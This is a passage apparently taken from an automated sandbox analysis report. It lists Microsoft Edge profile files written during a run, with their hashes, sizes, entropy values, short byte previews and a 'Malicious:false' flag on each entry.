                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):114579
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.579416393070104
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsyIZ7QgyO/u:J9LyxPXfOxr1lMe1nL/5L/TXE6W7vc
                                                                                                                                                                                                                                                                                                MD5:7C8444D46047A546A5F55C543715EDC5
                                                                                                                                                                                                                                                                                                SHA1:D7783332D103CBB5A0EB051C85CF8B31C60A5192
                                                                                                                                                                                                                                                                                                SHA-256:02960A7F0BADC585C12CBCF2B048DF6E934349EFDE59B9A76E779EA3226EBFCD
                                                                                                                                                                                                                                                                                                SHA-512:BE296E7BE8EA6A793175DAE63B7FE47A91B40750587AC007CF4D8FA5C9A331D61B0F2F309A197BE8E1D9768AD08B061F315EA95A1C95379F48D20C0F02DB2262
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):189113
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.386179898505786
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:pCoMNEGdawDA0ozm44L/EmTDDNRv0xPmbexfXUr6LX:MawDSzmL/THDQxH7X
                                                                                                                                                                                                                                                                                                MD5:66172EAB07F0506615B930D79E8D5989
                                                                                                                                                                                                                                                                                                SHA1:1306030F10EE0886F11D40065C374F0DFD72D457
                                                                                                                                                                                                                                                                                                SHA-256:B8EF9FCD4E3D00B1C744536E299C64C2FFE89AA1237C331E02B077F654388A23
                                                                                                                                                                                                                                                                                                SHA-512:9493BDC8E32580006F2178B385639B6802A0301048151C5B3F5AB29E9D0CEAF9E48F7AA15211099AC6C9042748D80561893D744E4B5C0B8AA3BCC6FB24747065
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:ZIYuAyXl/lYV/lxEstllQ5S+:2YPKYWs+Q+
                                                                                                                                                                                                                                                                                                MD5:14956A7816A25FC4580455373C148CB0
                                                                                                                                                                                                                                                                                                SHA1:03969A6C2D61B1FFCCCCE81ACE164D1A9BDF5C61
                                                                                                                                                                                                                                                                                                SHA-256:206D808416DA5D2F16FD726971BFC530FBB68DBEDC9242D388321EE13C9DECDC
                                                                                                                                                                                                                                                                                                SHA-512:E491FDB865B7BD790B083EC2E3368C87302C67397D01575EE666A74B6E3354B134A0E9FE4839F55D7B3C3E22D6734E058E788376CA8CAB009A523C9D9D5D4034
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@...l-u}oy retne.........................X....,....................D./.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6577
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.3872650809150118
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:AEG3jN1BIsS39Xp+BKilDVLl9iSrY5Zh/t2:y3jN1+9Xp+MuLl9iSrEZZt2
                                                                                                                                                                                                                                                                                                MD5:F079B92B04CE8C7A73925CE38E2B7C77
                                                                                                                                                                                                                                                                                                SHA1:F20FB82C16902C58B63703004ECCB5EBE52D4AC6
                                                                                                                                                                                                                                                                                                SHA-256:96129BEC027D1D3B800D0FBC47132ED704BC35268E3AF765835C281C3BC09379
                                                                                                                                                                                                                                                                                                SHA-512:996037F60B5938B0BBB96B47740A911DEF0B06023702B9F530AFACF21DBB8F1DC7F0D19D9DC1723F00D575548C47F03211425DCA76C462B873A899D0C97E16F2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................c..b................next-map-id.1.Cnamespace-5059b7c5_bd54_441c_afb7_1f64b42e2923-https://ntp.msn.com/.0V.e................V.e................V.e................iu..l................map-0-shd_sweeper.0{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.b.g.t.a.s.k.t.h.r.o.t.c.,.p.r.g.-.1.s.w.-.s.a.c.f.x.2.t.3.,.p.r.g.-.1.s.w.-.s.a.u.i.d.r.m.t.2.,.p.r.g.-.1.s.w.-.s.a.-.s.p.6.-.t.2.f.,.p.r.g.-.1.s.w.-.c.-.c.h.a.n.g.e.s.i.z.e.,.p.r.g.-.1.s.w.-.n.o.r.e.t.r.y.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.1.s.-.n.t.f.1.-.f.g.d.i.p.1.,.1.s.-.n.t.f.1.-.n.w.t
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.037027747637703
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7KUrjyq2PN723oH+TcwtrQMxIFUt8I7YUrFz1Zmw+I79jlRkwON723oH+Tcwtrb:fjyvVaYebCFUt8/uZ/+MR5OaYebtJ
                                                                                                                                                                                                                                                                                                MD5:8EE005635A31A4E9FB0B2DA46D943125
                                                                                                                                                                                                                                                                                                SHA1:D706EE07814951524390034DDC077FDDF95B668E
                                                                                                                                                                                                                                                                                                SHA-256:DD694E300ED183C645A6FD9A691A1E4B720A5FCF53975B2E594263D83777E02B
                                                                                                                                                                                                                                                                                                SHA-512:27E0DCFF20F619039018E94B5840184D9FC9502A0CE7B42914172CCDE0D4C8E89AA0778C067882876BFFB68A5135548AD0B2EE043738348B2B60BC2F5A79A8AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.201 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/20-01:31:32.207 1c74 Recovering log #3.2024/12/20-01:31:32.212 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8251420711408457
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:3wCPPQpsAF4unx0JtLp3X2amEtG1ChqKTG9BrbQKkOAM48:3jPPQzFkjLp2FEkChRTG9N0HOpL
                                                                                                                                                                                                                                                                                                MD5:9AE9A22F009882D208F7D6B5EA5B2154
                                                                                                                                                                                                                                                                                                SHA1:9CF3422967B08C32AAAE94C656CEFA28A08996AC
                                                                                                                                                                                                                                                                                                SHA-256:589F1F2FC47B5CD0B1EDE0F4368310195F598036FF5C86B39B7BD8D4A65DAECB
                                                                                                                                                                                                                                                                                                SHA-512:05C6CA603CBCE4B72937949A8A0507B4CB049F5F2D4A562910BFC432CA56DB203DEBF515F3465D08C49DA0F282C9961010893F18B6C75E7BC78A08C886727B7F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SNSS........=.!............=.!......".=.!............=.!........=.!........=.!........=.!....!...=.!................................=.!.=.!1..,....=.!$...5059b7c5_bd54_441c_afb7_1f64b42e2923....=.!........=.!....(...........=.!....=.!........................=.!....................5..0....=.!&...{46F3A197-DB49-410A-81B3-94975C835573}......=.!........=.!...........................=.!............=.!........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........^.)....^.).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):356
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.107246427230204
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PDPeq2PN723oH+Tcwt7Uh2ghZIFUt8IDhZmw+ID7kwON723oH+Tcwt7Uh2gnLJ:bevVaYebIhHh2FUt8a/+m5OaYebIhHLJ
                                                                                                                                                                                                                                                                                                MD5:6449CF454224A8E706A5807345660715
                                                                                                                                                                                                                                                                                                SHA1:9C121025E24CFA14A14EEF7100DE820C5E78D507
                                                                                                                                                                                                                                                                                                SHA-256:10A093172AD12FE7E28DC7C798CA673157087A1EF87CBC8C88E976EB048B089C
                                                                                                                                                                                                                                                                                                SHA-512:13AFF6DF3ECE017D366BAD8AFAC7D42044C44C3D62792D60637753BFACD043F897B09D38E3BF9D3D34827EB999A73ACCAE600DAF951C2CE9AD2D629AC3B21B00
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.561 1d80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/20-01:31:31.563 1d80 Recovering log #3.2024/12/20-01:31:31.563 1d80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):356
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.107246427230204
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PDPeq2PN723oH+Tcwt7Uh2ghZIFUt8IDhZmw+ID7kwON723oH+Tcwt7Uh2gnLJ:bevVaYebIhHh2FUt8a/+m5OaYebIhHLJ
                                                                                                                                                                                                                                                                                                MD5:6449CF454224A8E706A5807345660715
                                                                                                                                                                                                                                                                                                SHA1:9C121025E24CFA14A14EEF7100DE820C5E78D507
                                                                                                                                                                                                                                                                                                SHA-256:10A093172AD12FE7E28DC7C798CA673157087A1EF87CBC8C88E976EB048B089C
                                                                                                                                                                                                                                                                                                SHA-512:13AFF6DF3ECE017D366BAD8AFAC7D42044C44C3D62792D60637753BFACD043F897B09D38E3BF9D3D34827EB999A73ACCAE600DAF951C2CE9AD2D629AC3B21B00
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.561 1d80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/20-01:31:31.563 1d80 Recovering log #3.2024/12/20-01:31:31.563 1d80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):438
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.168478128212951
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:4FfvVaYebvqBQFUt8xWX/+x55OaYebvqBvJ:4JVaYebvZg8xWorOaYebvk
                                                                                                                                                                                                                                                                                                MD5:52CE4532C7DC68608FC67F72467CFED5
                                                                                                                                                                                                                                                                                                SHA1:1ADF89AB525EE6659FC92FAF656E40AD59BE6B5D
                                                                                                                                                                                                                                                                                                SHA-256:EFF6A2A23E108C71A1052873FB7AF901ED49BAB4211BE14F596989CB356CE352
                                                                                                                                                                                                                                                                                                SHA-512:3EBC401D350DA90905BCE07B00DD29798E9560BCAE963343A5E49BF6F73CF1BE1F40D10424D0D2AA45F45E8C836AD0232CF5F0BE7DEB08232E18EA1600AE200D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.162 1c30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/20-01:31:32.177 1c30 Recovering log #3.2024/12/20-01:31:32.192 1c30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):426
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2146850535924125
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:tCyvVaYebvqBZFUt8W/+7R5OaYebvqBaJ:EYVaYebvyg8TDOaYebvL
                                                                                                                                                                                                                                                                                                MD5:0BFA7315D70FF077479FCD86F2131501
                                                                                                                                                                                                                                                                                                SHA1:AC3DF4F7FC5A16381FFABCB1388BF265A5A42015
